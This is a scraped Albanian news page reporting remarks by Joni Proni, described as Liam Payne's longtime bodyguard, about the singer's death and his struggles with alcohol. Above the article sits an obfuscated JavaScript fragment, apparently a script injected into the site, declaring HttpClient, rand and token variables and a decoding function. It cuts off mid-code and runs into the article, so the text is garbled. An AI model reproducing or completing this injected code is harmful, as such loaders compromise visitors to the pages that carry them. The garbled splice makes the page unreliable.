;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Truproja i Payne ishte shqiptar, ja çfarë thotë pas vdekjes së artistit!

By

Joni Proni, i cili për 14 vite ka shërbyer si truproja personal i Liam Payne, ish-anëtarit të grupit të famshëm One Direction, ka ndarë emocionet e tij pas lajmit tragjik të vdekjes së këngëtarit.

Në një intervistë për emisionin “Jetë Shqiptare”, Proni u shpreh se ka qenë i shokuar dhe thellësisht i prekur nga humbja e Liamit, të cilin e përshkroi si një njeri të mrekullueshëm dhe të dashur.

Sipas Pronit, Liam ishte një person i mbyllur dhe kishte vuajtur prej vitesh nga problemet me alkoolin. Ai tregoi se shpesh e kishte kritikuar këngëtarin për këtë zakon dhe madje i kishte hequr alkoolin nga dora, duke u përpjekur ta ndihmonte. “Unë e doja si djalin tim,” tha Proni, “por kohët e fundit kam qenë shumë i shqetësuar për të”.

“Po të isha me të, Liami do të ishte gjallë sot”, tha ai tutje.

 

Artikuj të ngjashëm